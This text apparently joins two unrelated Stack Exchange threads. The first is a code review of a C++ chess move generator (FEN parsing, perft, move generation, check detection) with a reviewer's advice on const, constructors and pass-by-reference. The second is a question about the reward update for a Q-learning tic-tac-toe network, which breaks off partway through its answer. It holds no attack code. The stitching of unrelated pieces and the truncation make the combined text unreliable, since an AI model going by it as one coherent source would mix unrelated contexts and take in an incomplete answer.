{11,'B'}, {12, 'R'}, {13, 'Q'}, {14, 'K'}, {17, 'p'}, {18, 'n'}, {19,'b'}, {20, 'r'}, {21, 'q'}, {22, 'k'} }; int temp; std::cout << "Board:\n"; for (int i = 7; i >= 0; --i) { for (int j = 0; j < 8; ++j) { temp = test.board[i * 8 + j]; if (temp != 0) { std::cout << pieces[temp]; } else { std::cout << "."; } } std::cout << std::endl; } std::cout << "White To Move: " << (test.whiteToMove == 1) << "\n"; std::cout << "Castling Right: {"; for (int i = 0; i < 4; ++ i) { std::cout << test.castlingRights[i] << " "; } std::cout << "}" << std::endl; std::cout << "En Passant: " << test.enPassant << "\n"; 
std::cout << "Move Clock: " << test.moveClock << "\n"; std::cout << "Moves: " << test.wholeTurn << "\n"; } int main() { //Example usage gameState test = initWithFEN("rnbq1k1r/pp1Pbppp/2p5/8/2B5/8/PPP1NnPP/RNBQK2R w KQ - 1 8"); printStateTest(test); std::cout << "Position " << perft(test, 4) << "\n"; return 0; } main.hpp #ifndef main_h #define main_h #include "gameState.hpp" int perft (gameState currentState, int depth); std::map<std::string, int> perftDivide (gameState currentState, int depth); void printStateTest(gameState test); #endif /* main_h */ gameState.cpp #include <string> #include "gameState.hpp" #include "pieces.hpp" #include "move.hpp" std::map<char, int>charToPiece = { {'P', TYPE_PAWN}, {'N', TYPE_KNIGHT}, {'B', TYPE_BISHOP}, {'R', TYPE_ROOK}, {'Q', TYPE_QUEEN}, {'K', TYPE_KING}, }; bool isSameColor (int original, int reference) { return (original & 24) == (reference & 24); } bool isSameType (int original, int reference) { return (original & 7) == (reference & 7); } int oppsiteColor (int original) { int output; switch (original & 24) { case 8: output = (original & 7) | 16; break; case 16: output = (original & 7) | 8; break; default: output = original; } return output; } gameState addPiece (gameState currentState, int pieceType, int position) { gameState newState = currentState; newState.board[position] = pieceType; return newState; } gameState deletePiece (gameState currentState, int position) { gameState newState = currentState; newState.board[position] = 0; return newState; } gameState movePieceFromPos (gameState currentState, int startPos, int endPos) { gameState newState = currentState; newState = addPiece(newState, newState.board[startPos], endPos); newState = deletePiece(newState, startPos); return newState; } gameState initWithFEN (std::string FEN) { gameState newState; std::vector<std::string> parts(6); //Seperate different parts int temp = 0; for (int i = 0; i < FEN.size(); ++i) { if (FEN[i] == ' ') { ++temp; } else { parts[temp] += FEN[i]; } 
} //Setting up the board int rank = 7, file = 0, piece; std::string boardFEN = parts[0]; char current; for (int i = 0; i < boardFEN.size(); ++i) { current = boardFEN[i]; if (current == '/') { file = 0; --rank; } else { if (isdigit(current)) { file += current - '0'; } else { piece = charToPiece[toupper(current)]; piece += isupper(current) ? COLOR_WHITE : COLOR_BLACK; newState.board[rank * 8 + file] = piece; ++file; } } } //Side to move newState.whiteToMove = (parts[1] == "w"); //Castling rights for (int i = 0; i < parts[2].size(); ++i) { if (parts[2][i] == 'K') { newState.castlingRights[0] = true; } if (parts[2][i] == 'Q') { newState.castlingRights[1] = true; } if (parts[2][i] == 'k') { newState.castlingRights[2] = true; } if (parts[2][i] == 'q') { newState.castlingRights[3] = true; } } //En passant if (parts[3] == "-") { newState.enPassant = -1; } else { newState.enPassant = cordAlgebraicToNum(parts[3]); } //Half move clock newState.moveClock = std::stoi(parts[4]); //Whole moves newState.wholeTurn = std::stoi(parts[5]); return newState; } #include "gameState.hpp" gameState.hpp #ifndef gameState_hpp #define gameState_hpp #include <stdio.h> #include <vector> #include <string> class gameState { public: std::vector<int> board = std::vector<int>(64); std::vector<bool> castlingRights = std::vector<bool>(4); bool whiteToMove; int enPassant, wholeTurn, moveClock; }; bool isSameColor (int original, int reference); bool isSameType (int original, int reference); int oppsiteColor (int original); gameState addPiece (gameState currentState, int pieceType, int position); gameState deletePiece (gameState currentState, int position); gameState movePieceFromPos (gameState currentState, int startPos, int endPos); gameState initWithFEN (std::string FEN); #endif /* gameState_hpp */ piece.hpp #ifndef pieces_hpp #define pieces_hpp #include <stdio.h> #include <string> #include <map> enum pieceType { //EMPTY = 0, TYPE_PAWN = 1, TYPE_KNIGHT = 2, TYPE_BISHOP = 3, TYPE_ROOK = 4, TYPE_QUEEN = 
5, TYPE_KING = 6 }; enum pieceColor { COLOR_WHITE = 8, COLOR_BLACK = 16, COLOR_ANY = 24 }; #endif /* pieces_hpp */ move.cpp #include "move.hpp" #include "gameState.hpp" #include "pieces.hpp" pieceMove initMove (int start, int end, int flag) { pieceMove output; output.startSqr = start; output.endSqr = end; output.flag = flag; return output; } gameState applyMove (gameState currentState, pieceMove move) { //Make move gameState newState; newState = movePieceFromPos(currentState, move.startSqr, move.endSqr); newState.whiteToMove ^= 1; if (newState.whiteToMove) { ++newState.wholeTurn; } if (isSameType(newState.board[move.startSqr], TYPE_PAWN) || newState.board[move.endSqr] != 0) { newState.moveClock = 0; } else { ++newState.moveClock; } int castlingSide, isKingSide; for (int i = 0; i < 8; i += 7) { for (int j = 0; j < 8; j += 7) { if (move.startSqr == (i * 8 + j) || move.endSqr == (i * 8 + j)) { castlingSide = i == 0 ? 0 : 2; isKingSide = j == 0; newState.castlingRights[castlingSide | isKingSide] = false; } } if (move.startSqr == (i * 8 + 4) || move.endSqr == (i * 8 + 4)) { castlingSide = i == 0 ? 0 : 2; newState.castlingRights[castlingSide] = false; newState.castlingRights[castlingSide + 1] = false; } } switch (move.flag) { case FLAG_DOUBLE_JUMP: { newState.enPassant = move.endSqr; break; } case FLAG_EN_PASSANT: { newState.board[newState.enPassant] = 0; newState.enPassant = -1; break; } case FLAG_CASTLE: { int rookStartPosition = (move.startSqr - move.endSqr == 2) ? move.startSqr - 4 : move.startSqr + 3; int rookEndPosition = (move.startSqr - move.endSqr == 2) ? 
move.startSqr - 1 : move.startSqr + 1; newState = movePieceFromPos(newState, rookStartPosition, rookEndPosition); break; } case FLAG_PROMOTE_KNIGHT: { newState.board[move.endSqr] = (newState.board[move.endSqr] & 24) | TYPE_KNIGHT; break; } case FLAG_PROMOTE_BISHOP: { newState.board[move.endSqr] = (newState.board[move.endSqr] & 24) | TYPE_BISHOP; break; } case FLAG_PROMOTE_ROOK: { newState.board[move.endSqr] = (newState.board[move.endSqr] & 24) | TYPE_ROOK; break; } case FLAG_PROMOTE_QUEEN: { newState.board[move.endSqr] = (newState.board[move.endSqr] & 24) | TYPE_QUEEN; break; } } if (move.flag != FLAG_DOUBLE_JUMP) { newState.enPassant = -1; } return newState; } int cordAlgebraicToNum (std::string cordinate) { return (cordinate[0] - 'a') + (cordinate[1] - '1') * 8; } std::string cordNumToAlgebraic (int cordinate) { char rank = '1' + cordinate / 8; char file = (cordinate % 8) + ((int) 'a'); return std::string() + file + rank; } std::string moveToUCI (pieceMove move) { std::string output; output = cordNumToAlgebraic(move.startSqr) + cordNumToAlgebraic(move.endSqr); switch (move.flag) { case FLAG_PROMOTE_KNIGHT: { output += "n"; break; } case FLAG_PROMOTE_BISHOP: { output += "b"; break; } case FLAG_PROMOTE_ROOK: { output += "r"; break; } case FLAG_PROMOTE_QUEEN: { output += "q"; break; } } return output; } move.hpp #ifndef move_hpp #define move_hpp #include <stdio.h> #include "gameState.hpp" class pieceMove { public: int startSqr; int endSqr; int flag; }; enum moveFlag { FLAG_NONE = 0, FLAG_DOUBLE_JUMP = 1, FLAG_EN_PASSANT = 2, FLAG_CASTLE = 3, FLAG_PROMOTE_KNIGHT = 4, FLAG_PROMOTE_BISHOP = 5, FLAG_PROMOTE_ROOK = 6, FLAG_PROMOTE_QUEEN = 7 }; pieceMove initMove (int start, int end, int flag); gameState applyMove (gameState currentState, pieceMove move); int cordAlgebraicToNum (std::string cordinate); std::string cordNumToAlgebraic (int cordinate); std::string moveToUCI (pieceMove move); #endif /* move_hpp */ moveGen.cpp #include "moveGen.hpp" #include "move.hpp" 
#include "gameState.hpp" #include "pieces.hpp" #include <vector> #include <iostream> #include <math.h> bool isInCheck (gameState currentState, int side) { int kingPosition = 0; for (int i = 0; i < 64; ++i) { if (currentState.board[i] == (side | TYPE_KING)) { kingPosition = i; break; } } //Pawn attacks int opponentDirection; opponentDirection = side == COLOR_WHITE ? 8 : -8; for (int i = -1; i < 2; i += 2) { if (moveCanBeMade(kingPosition, opponentDirection + i) && currentState.board[kingPosition + i + opponentDirection] == oppsiteColor(side | TYPE_PAWN)) { return true; } } //Knight attacks std::vector<int> directions = {-17, -15, -10, -6, 6, 10, 15, 17}; int destination; for (int i = 0; i < directions.size(); ++i) { if (moveCanBeMade(kingPosition, directions[i])) { destination = kingPosition + directions[i]; if (currentState.board[destination] == oppsiteColor(side | TYPE_KNIGHT)) { return true; } } } //King opposition directions = {-9, -8, -7, -1, 1, 7, 8, 9}; for (int i = 0; i < directions.size(); ++i) { if (moveCanBeMade(kingPosition, directions[i])) { destination = kingPosition + directions[i]; if (currentState.board[destination] == oppsiteColor(side | TYPE_KING)) { return true; } } } //Rook and (non-diaganol) Queen attacks directions = {-8, -1, 1, 8}; for (int i = 0; i < directions.size(); ++i) { destination = kingPosition; for (int j = 0; j < 7; ++j) { //Can't move past the edge if (!moveCanBeMade(destination, directions[i])) { break; } destination += directions[i]; //Found an attack piece if ((currentState.board[destination] == oppsiteColor(side | TYPE_ROOK)) || (currentState.board[destination] == oppsiteColor(side | TYPE_QUEEN))) { return true; } //Obstructed by piece if (currentState.board[destination]) { break; } } } //Bishop and (diaganol) Queen attacks directions = {-9, -7, 7, 9}; for (int i = 0; i < directions.size(); ++i) { destination = kingPosition; for (int j = 0; j < 7; ++j) { //Can't move past the edge if (!moveCanBeMade(destination, 
directions[i])) { break; } destination += directions[i]; //Found an attack piece if ((currentState.board[destination] == oppsiteColor(side | TYPE_BISHOP)) || (currentState.board[destination] == oppsiteColor(side | TYPE_QUEEN))) { return true; } //Obstructed by piece if (currentState.board[destination]) { break; } } } return false; } std::vector<pieceMove> generatePseudoMoves (gameState currentState, int sideToMove) { int piece, type; pieceMove move; std::vector<pieceMove> pseudoMoves; for (int i = 0; i < 64; ++i) { piece = currentState.board[i]; if (isSameColor(piece, sideToMove)) { type = piece & 7; move.startSqr = i; switch (type) { case TYPE_PAWN: { bool isWhite = isSameColor(piece, COLOR_WHITE); int startingRank = isWhite ? 1 : 6; int promotionRank = isWhite ? 7 : 0; int forwardDirection = isWhite ? 8 : -8; //Forward move if (currentState.board[i + forwardDirection] == 0 && moveCanBeMade(i, forwardDirection)) { if ((i + forwardDirection) / 8 != promotionRank) { pseudoMoves.push_back(initMove(i, i + forwardDirection, FLAG_NONE)); } else { //Promotion pseudoMoves.push_back(initMove(i, i + forwardDirection, FLAG_PROMOTE_KNIGHT)); pseudoMoves.push_back(initMove(i, i + forwardDirection, FLAG_PROMOTE_BISHOP)); pseudoMoves.push_back(initMove(i, i + forwardDirection, FLAG_PROMOTE_ROOK)); pseudoMoves.push_back(initMove(i, i + forwardDirection, FLAG_PROMOTE_QUEEN)); } //Double jump if (currentState.board[i + forwardDirection * 2] == 0 && (i / 8) == startingRank) { pseudoMoves.push_back(initMove(i, i + forwardDirection * 2, FLAG_DOUBLE_JUMP)); } } //Diagonal capture int neighbor; for (int j = -1; j < 2; j += 2) { neighbor = i + j; //Normal capture if (moveCanBeMade(i, j + forwardDirection) && isSameColor(currentState.board[i], oppsiteColor(currentState.board[neighbor + forwardDirection]))) { if ((i + forwardDirection) / 8 != promotionRank) { pseudoMoves.push_back(initMove(i, neighbor + forwardDirection, FLAG_NONE)); } else { //Promotion pseudoMoves.push_back(initMove(i, 
neighbor + forwardDirection, FLAG_PROMOTE_KNIGHT)); pseudoMoves.push_back(initMove(i, neighbor + forwardDirection, FLAG_PROMOTE_BISHOP)); pseudoMoves.push_back(initMove(i, neighbor + forwardDirection, FLAG_PROMOTE_ROOK)); pseudoMoves.push_back(initMove(i, neighbor + forwardDirection, FLAG_PROMOTE_QUEEN)); } } //En passant if (moveCanBeMade(i, j + forwardDirection) && isSameColor(currentState.board[i], oppsiteColor(currentState.board[neighbor])) && currentState.enPassant == neighbor) { pseudoMoves.push_back(initMove(i, neighbor + forwardDirection, FLAG_EN_PASSANT)); } } break; } case TYPE_KNIGHT: { std::vector<pieceMove> moveList = generateSlidingMoves(currentState, i, {-17, -15, -10, -6, 6, 10, 15, 17}, 1); pseudoMoves.insert(std::end(pseudoMoves), std::begin(moveList), std::end(moveList)); break; } case TYPE_BISHOP: { std::vector<pieceMove> moveList = generateSlidingMoves(currentState, i, {-9, -7, 7, 9}, 7); pseudoMoves.insert(std::end(pseudoMoves), std::begin(moveList), std::end(moveList)); break; } case TYPE_ROOK: { std::vector<pieceMove> moveList = generateSlidingMoves(currentState, i, {-8, -1, 1, 8}, 7); pseudoMoves.insert(std::end(pseudoMoves), std::begin(moveList), std::end(moveList)); break; } case TYPE_QUEEN: { std::vector<pieceMove> moveList = generateSlidingMoves(currentState, i, {-9, -8, -7, -1, 1, 7, 8, 9}, 7); pseudoMoves.insert(std::end(pseudoMoves), std::begin(moveList), std::end(moveList)); break; } case TYPE_KING: { std::vector<pieceMove> moveList = generateSlidingMoves(currentState, i, {-9, -8, -7, -1, 1, 7, 8, 9}, 1); pseudoMoves.insert(std::end(pseudoMoves), std::begin(moveList), std::end(moveList)); int castlingRightsStart = sideToMove == COLOR_WHITE ? 
0 : 2; //Kingside castle if (currentState.castlingRights[castlingRightsStart]) { if (!(currentState.board[i + 1] | currentState.board[i + 2]) && !(isInCheck(currentState, sideToMove) || isInCheck(movePieceFromPos(currentState, i, i + 1), sideToMove))) { pseudoMoves.push_back(initMove(i, i + 2, FLAG_CASTLE)); } } //Queenside castle if (currentState.castlingRights[castlingRightsStart + 1]) { if (!(currentState.board[i - 1] | currentState.board[i - 2] | currentState.board[i - 3]) && !(isInCheck(currentState, sideToMove) || isInCheck(movePieceFromPos(currentState, i, i - 1), sideToMove))) { pseudoMoves.push_back(initMove(i, i - 2, FLAG_CASTLE)); } } break; } } } } return pseudoMoves; } std::vector<pieceMove> generateLegalMoves (gameState currentState, int sideToMove) { std::vector<pieceMove> moveList, legalMoves, pseudoMoves = generatePseudoMoves(currentState, sideToMove); for (int i = 0; i < pseudoMoves.size(); ++i) { if (!isInCheck(applyMove(currentState, pseudoMoves[i]), sideToMove)) { legalMoves.push_back(pseudoMoves[i]); } } return legalMoves; } std::vector<pieceMove> generateSlidingMoves (gameState currentState, int square, std::vector<int> directions, int maxDepth) { //Move generation for Knights, Rooks, Queens and Kings std::vector<pieceMove> possibleMoves; pieceMove move; int destination; for (int i = 0; i < directions.size(); ++i) { destination = square; for (int j = 0; j < maxDepth; ++j) { //Can't move pass the edge if (!moveCanBeMade(destination, directions[i])) { break; } destination += directions[i]; //Can't capture own piece if (isSameColor(currentState.board[square], currentState.board[destination])) { break; } move.endSqr = destination; possibleMoves.push_back(initMove(square, destination, FLAG_NONE)); //Can't move past captured pieces if (isSameColor(currentState.board[square], oppsiteColor(currentState.board[destination]))) { break; } } } return possibleMoves; } long long int easyMask (int direction) { //Prevent moving past the edge long long int 
mask = 0; int vertical, horizontal; vertical = (int) lround((float) direction / 8); horizontal = direction - vertical * 8; if (horizontal != 0) { if (horizontal > 0) { for (int i = 0; i < horizontal; ++i) { mask = mask | ( 0x101010101010101 << (7 - i)); } } else { for (int i = 0; i < (~horizontal + 1); ++i) { mask = mask | ( 0x101010101010101 << i); } } } if (vertical != 0) { if (vertical > 0) { for (int i = 0; i < vertical; ++i) { mask = mask | ( 0xff00000000000000 >> (i * 8)); } } else { for (int i = 0; i < (~vertical + 1); ++i) { mask = mask | ( 0xff << (i * 8)); } } } return mask; } bool moveCanBeMade (int square, int direction) { return !((easyMask(direction) >> square) & 1); } moveGen.hpp #ifndef moveGen_hpp #define moveGen_hpp #include <stdio.h> #include <vector> #include "move.hpp" #include "gameState.hpp" bool isInCheck (gameState currentState, int side); std::vector<pieceMove> generateSlidingMoves (gameState currentState, int square, std::vector<int> directions, int maxDepth); std::vector<pieceMove> generatePseudoMoves (gameState currentState, int sideToMove); std::vector<pieceMove> generateLegalMoves (gameState currentState, int sideToMove); long long int easyMask (int direction); bool moveCanBeMade (int square, int direction); #endif /* moveGen_hpp */ Answer: std::map<std::string, int> perftDivide (gameState currentState, int depth) { std::map<std::string, int> output; First thing I notice: name your types. You have a map as the result, and a local variable with the same kind of map ... are these the same kind of thing, or do they just coincidentally use the same data structure? And what is it? int sideToMove = currentState.whiteToMove ? COLOR_WHITE : COLOR_BLACK; Make that const. It doesn't change after you figure it out once. std::vector<pieceMove> moveList = generateLegalMoves(currentState, sideToMove); Use auto. And why is sideToMove an integer rather than an enumeration type? 
for (int i = 0; i < moveList.size(); ++i) { output[moveToUCI(moveList[i])] = perft(applyMove(currentState, moveList[i]), depth - 1); } You're going through the entire container in order, so use the range-based for loop: for (auto& mv : moveList) output[moveToUCI(mv)] = perft(applyMove(currentState,mv), depth-1); and that also takes care of the nit that you repeated moveList[i]. This is not a big deal for a vector, but more generally looking things up can be expensive. Don't do the same work multiple times in the same line! As for whether mvshould be const as well, I can't tell just from looking here. Think about it. Add const throughout the code. You are passing gamestate by value. This deep copies the two vectors it contains, you know. That function doesn't appear to modify the gamestate in-place. So why are you passing it around by value everywhere? std::map<char, int>charToPiece = { {'P', TYPE_PAWN}, {'N', TYPE_KNIGHT}, {'B', TYPE_BISHOP}, {'R', TYPE_ROOK}, {'Q', TYPE_QUEEN}, {'K', TYPE_KING}, }; This is a global variable, not static and not inside a namespace. You should be careful what global names you make, as this will become a problem when you combine libraries and other code. I expect this is a fixed lookup table? Why isn't it const or better yet constexpr if your version of the compiler handles that. But still, for this use, that is a very expensive way to do it. This is better implemented as a function containing a switch statement. And, why is the map using int instead of the enumeration type? class gameState { public: std::vector<int> board = std::vector<int>(64); std::vector<bool> castlingRights = std::vector<bool>(4); bool whiteToMove; int enPassant, wholeTurn, moveClock; }; Those vectors are initialized to specific sizes... are they actually fixed size? Consider using an array instead of a vector if they will never change size! Note also that std::vector<bool> is weird. This may or may not bother you in this application. 
pieceMove initMove (int start, int end, int flag) { pieceMove output; output.startSqr = start; output.endSqr = end; output.flag = flag; return output; } I think you meant to write a constructor. Even your comment calls this "initialize pieceMove". I see you wrote pieceMove as a class with all public data members and no functions, so it's just a plain struct. But maybe it should have member functions... you're just not using them right. gameState initWithFEN (std::string FEN) { Again, it appears that this should actually be a constructor for gameState. You are passing in FEN by value. Do you actually need to make a local copy of the string? Normally you should pass these as const&, but it's even better to use std::string_view. //Castling rights for (int i = 0; i < parts[2].size(); ++i) { if (parts[2][i] == 'K') { newState.castlingRights[0] = true; } if (parts[2][i] == 'Q') { newState.castlingRights[1] = true; } if (parts[2][i] == 'k') { newState.castlingRights[2] = true; } if (parts[2][i] == 'q') { newState.castlingRights[3] = true; } } Don't repeat blocks of code that only have one little thing like a single variable that's different between the copies. Copy/paste is not your friend. You're also repeating the indexinging of parts[2]. All your commented sections in this long function should really be separate functions. Functions should be cohesive and do one thing. To eliminate the duplicated statement, do the mapping of the letter to the index as a distinct step: for (const auto L : parts[2]) { newState[castlingRights[castle_index(part)]=true; } long long int is compiler-specific as to how many bits it has. I think you are counting on it being a specific size. Also, you probably meant to be unsigned as you need the top bit for your bit flags as well. So use std::uint64_t. Summary of issues to work on Break up meandering functions into their individual helper functions. Declare names for various types you use like the map. 
Don't pass by value for non-simple types, most of the time. Use the enumeration types you created. They are types, not just a handy way to declare some constant ints. Use classes properly: data members private, functions that work on them are member functions. Use the special member functions for their proper role; i.e. constructors. Use const. Use a range-based for loop when you can. Don't repeat code multiple times with only a single symbol changed between them.
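Pulling the review's suggestions together, here is a hypothetical sketch of what the refactored declarations might look like. The names mirror the poster's originals, but the enum values and defaults are my assumptions, not the actual code under review:

```cpp
#include <array>

// Enumeration used as a real type, not a bag of constant ints.
enum class PieceType { Pawn, Knight, Bishop, Rook, Queen, King, None };

// Cheap, constexpr lookup: a switch instead of a global std::map.
constexpr PieceType charToPiece(char c) {
    switch (c) {
        case 'P': return PieceType::Pawn;
        case 'N': return PieceType::Knight;
        case 'B': return PieceType::Bishop;
        case 'R': return PieceType::Rook;
        case 'Q': return PieceType::Queen;
        case 'K': return PieceType::King;
        default:  return PieceType::None;
    }
}

struct pieceMove {
    int startSqr, endSqr, flag;
    // A constructor instead of a free initMove() function.
    pieceMove(int start, int end, int f) : startSqr(start), endSqr(end), flag(f) {}
};

struct gameState {
    std::array<int, 64> board{};           // fixed size -> std::array, not vector
    std::array<bool, 4> castlingRights{};  // also sidesteps std::vector<bool> quirks
    bool whiteToMove = true;
    int enPassant = -1, wholeTurn = 1, moveClock = 0;
};
```

With these types, a function like perft would take const gameState& rather than copying two vectors on every recursive call.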
{ "domain": "codereview.stackexchange", "id": 41507, "tags": "c++, performance, chess" }
How is the formula of mean activity coefficient derived?
Question: The mean activity coefficient is defined as follows: $$\gamma_\pm = (\gamma_+\gamma_-)^{1/2}.\tag{1}$$ If the Debye-Hückel equation $$-\log\gamma_i = 0.5z_i^2\mu^{1/2}\tag{2}$$ is used, then the mean activity coefficient has the form $$-\log\gamma_\pm = 0.5|z_+z_-|\mu^{1/2},\label{eqn:3}\tag{3}$$ where $\mu$ is the ionic strength, $z_i$ is the charge of species $i,$ $\gamma_i$ is the activity coefficient. But I'm confused about the equation \eqref{eqn:3}. It can be found as equation \eqref{eqn:3-38} in Snoeyink and Jenkins' Water Chemistry [1]: […] developed for ionic strengths of less than approximately $\pu{5E-3}$ and can be stated as $$-\log\gamma_i = 0.5Z_i^2\mu^{1/2}.\tag{3-34}$$ Because anions cannot be added to a solution without an equivalent number of cations (and vice versa), it is impossible to determine experimentally the activity coefficient of a single ion. Therefore, Eqs. 3-34, 3-35, and 3-36 cannot be verified directly. However, it is possible to define, and measure experimentally, a mean activity coefficient, $\gamma_\pm,$ as, $$\gamma_\pm = (\gamma_+\gamma_-)^{1/2}.\tag{3-37}$$ The Debye-Hückel and Güntelberg relationships can be extended to the mean activity coefficient thus: $$-\log\gamma_\pm = 0.5|Z_+Z_-|\mu^{1/2},\label{eqn:3-38}\tag{3-38}$$ Below is my derivation process: $$ \begin{align} -\log\gamma_+ &= 0.5z_+^2\mu^{1/2};\tag{4.1}\\ -\log\gamma_- &= 0.5z_-^2\mu^{1/2},\tag{4.2} \end{align} $$ so $$ \begin{align} -\log\gamma_\pm &= -\log[10^{-0.5z_+^2\mu^{1/2}}\times 10^{-0.5z_-^2\mu^{1/2}}]^{1/2} \tag{5.1}\\ & = -\log[10^{-0.5\mu^{1/2}(z_+^2+z_-^2)}]^{1/2} \tag{5.2}\\ & = 0.25\mu^{1/2}(z_+^2+z_-^2). \tag{5.3} \end{align} $$ This result is different from $0.5|z_+z_-|\mu^{1/2}.$ Can someone tell me which step is wrong in my process? Reference Snoeyink, V. L.; Jenkins, D. Water Chemistry; Wiley: New York, 1980. ISBN 978-0-471-05196-1.
Answer: The problem is you were starting with an expression for the mean activity coefficient for salts where both the cation and anion were monovalent, and then attempting to derive, from this, a general expression for salts of all empirical formulas. To correct this, you need to start with the general expression for the mean activity coefficient of salts of any empirical formula. If the empirical formula of the salt is of the form $\ce{A_pB_q}$, where A is the cation and B is the anion, then the general formula for the mean activity coefficient is: $$\gamma_{\pm} = \sqrt[p+q]{\gamma^p_+\gamma^q_-}$$ [Adapted from: https://en.wikipedia.org/wiki/Activity_coefficient, where I've taken the Wikipedia expression and substituted $\gamma_+$ for $\gamma_A$, and $\gamma_-$ for $\gamma_B$, to correspond to the nomenclature you are using.] Charge balance dictates that $|z_+| = q$ and $|z_-| = p$. [E.g., in $\ce{A_2B_3}$, the charge on A must be 3+, and that on B must be 2- (or some integer multiple of those).] Substituting, we have: $$\gamma_{\pm} = \sqrt[|z_-|+|z_+|]{\gamma^{|z_-|}_+\gamma^{|z_+|}_-}$$ If you use that in place of eqn. (3-37) in your post, and work through your calculations again, you will get the result shown in eqn. (3-38), which is a general result for any values of p and q.
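Working the substitution through explicitly (with $p = |z_-|$, $q = |z_+|$ and the Debye-Hückel expressions inserted):

```latex
\begin{align}
-\log\gamma_\pm &= \frac{|z_-|(-\log\gamma_+) + |z_+|(-\log\gamma_-)}{|z_-|+|z_+|}\\
&= \frac{0.5\mu^{1/2}\left(|z_-|z_+^2 + |z_+|z_-^2\right)}{|z_-|+|z_+|}\\
&= \frac{0.5\mu^{1/2}\,|z_+||z_-|\left(|z_+|+|z_-|\right)}{|z_-|+|z_+|}\\
&= 0.5|z_+z_-|\mu^{1/2},
\end{align}
```

which is eqn. (3-38). Note that for a 1:1 electrolyte $(|z_+| = |z_-| = 1)$ the poster's eqn. (5.3) agrees with this, since then $0.25(z_+^2+z_-^2) = 0.5 = 0.5|z_+z_-|$; the two expressions only diverge for asymmetric salts.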
{ "domain": "chemistry.stackexchange", "id": 14257, "tags": "physical-chemistry, electrochemistry, equilibrium, solutions" }
Could standard model quarks be arranged into different number of generations?
Question: Usually we arrange the quarks into 3 generations, depending on their mass. But for example, I can think of various other ways to group the quarks. E.g. the $(charm,bottom,top)$ quarks don't seem to fit into a family since they have electric charges $Q=(+2/3,-1/3,+2/3)$ respectively. But one could postulate that they each have 2 more quantum numbers $R=(-1/3,+2/3,+2/3)$ and $S=(+2/3,+2/3,-1/3)$. And then they would form a symmetric family permuting the 3 quantum numbers $Q$, $R$ and $S$. One could do a similar thing for the $(down,up,strange)$ quarks. Therefore perhaps an equally valid way to group the quarks would be into 2 generations, $(up,down,strange)$ and $(charm,bottom,top)$, with a broken symmetry caused by the photon being massless and hypothetical bosons corresponding to the $R$ and $S$ charges being massive. Apart from the fact that there is no evidence (so far) of additional quantum numbers relating to the quarks, is there any reason that we group the quarks into 3 generations ordered by mass? (The "ordered by mass" seems very arbitrary.) Or is it merely convention? It would be possible to do a similar trick arranging the 3+3 leptons and neutrinos into 2 generations. Answer: You may certainly arrange fermions any way that appeals to you and admire their properties, or try to discern numerological properties for their masses. But beware of theorists getting egg on their faces for three and a half decades in such efforts, which hardly discourages them... The point you are not acknowledging is that the present arrangement of fermions in generations in popular charts is a creature of history and convenience, not a logical necessity. See here. The generations must be such to represent triplicate superfluous replication of weak isodoublets, after suitable CKM/PMNS mixing rotations, and to expedite the obviousness of the gauge anomaly cancellations.
Originally, for quarks, these mixing angles were "small", as these matrices are fatter in the diagonal (a fact exploited by Wolfenstein). If you chose to permute the up and the charmed quarks in their generation assignments, however, nobody would cringe, provided you adjusted the CKM matrix accordingly to yield the same electroweak coupling vertices to the charged vector bosons. (But ... people would hate you for superfluously writing something down so gratuitously unmemorable. GUT desperadoes have already been there.) The lepton arrangement is already stressful in that their flavor mixings are huge, so the present arbitrary assignment by mass is the most memorable. In fact, the linkage between specific quark generations and lepton generations is even weaker: you need not adjust any mixing matrices if you just permuted their first with their third generation, leaving quarks alone, etc... To sum up, the present middle-school chart grew historically as the heavier particles were being discovered and joined the chart, and of course, the neutrinos in it were given their placeholder names "lightest, medium, heaviest" precisely to obviate even knowing which is which, and relegating the issue to one of PMNS matrix labelling. Arranging fermions in different patterns is as meaningful as the conclusions it motivates.
{ "domain": "physics.stackexchange", "id": 77337, "tags": "mass, standard-model, quarks" }
Why does a car need more torque when accelerating from rest?
Question: Since static friction helps rolling motion rather than opposing it, why do we say we need more torque to get the car to move from rest? If the rolling friction coefficient is static and torque = mass * acceleration * wheel radius, surely the mass and radius do not change. So why do we need more torque at the start of movement than during regular acceleration when the car is already moving? Answer: There are two factors I know of. First, and less important, overcoming static friction requires more force than kinetic friction. This applies to all of the internal parts that have to get going/moving past each other, and probably to the rolling friction of the tires. The major reason, though, has to do with how cars based on internal combustion engines work. See, an internal combustion engine can only supply torque and power when it's already moving. That's why you need an electric starter motor to get the engine going when you start the car. Now think about if the engine were linked directly to the wheels by gears - that would mean if the car is stopped, the engine isn't running. To get over this problem cars have a clutch inside of them that transmits the torque from the engine to the gear box and drive shaft. When the clutch is fully engaged, all of the torque and power are transmitted. As it is in the process of engaging, though, only part of the power is transmitted. This is especially important when starting from rest because it is that partial engagement that allows the wheels to come up to a speed that the engine can supply torque at without stopping. So, bottom line, the engine needs to be able to supply more torque at low rotation rates in order to get the car moving because not all of the power is being transmitted to the drive train by the clutch. With an electric motor this is not a problem - they can supply 100% of their torque even at zero rotation.
{ "domain": "physics.stackexchange", "id": 81993, "tags": "newtonian-mechanics, everyday-life, torque" }
Q learning Neural network Tic tac toe - When to train net
Question: This is another question I have on a Q-learning neural network being used to win tic tac toe: I'm not sure I understand when to actually backpropagate through the network. What I am currently doing is: as the program plays through the game, if the number of game sets recorded has reached the max amount, then every time the program makes a move it will pick a random game state from its memory and backpropagate using that game state and reward. This will then continue every time the program makes a move, as the replay memory will always be full from then on. The association between rewards and game state and action from history is that when a game has been completed and the rewards have been calculated for each step, meaning that the total reward per step has been calculated, the method I use to calculate the reward is: Q(s,a) += reward * gamma^(inverse position in game state) In this case, gamma is a value predetermined to reduce the amount that the reward is taken into account the further you go back, and the inverse position in game state means that if there have been 5 total moves in a game, then the inverse position in game state when changing the reward for the first move would be 5, then for the second, 4, third 3 and so on. This just allows the reward to be taken less into account the earlier the move is. Should this allow the program to learn correctly? Answer: This update scheme: Q(s,a) += reward * gamma^(inverse position in game state) has a couple of problems: You are - apparently - incrementing Q values rather than training them to a reference target. As a result, the estimate for Q will likely diverge, predicting total rewards that are impossibly high or low. Although in your case with a zero sum game and initial random moves, it may just random walk around zero for a long time first.
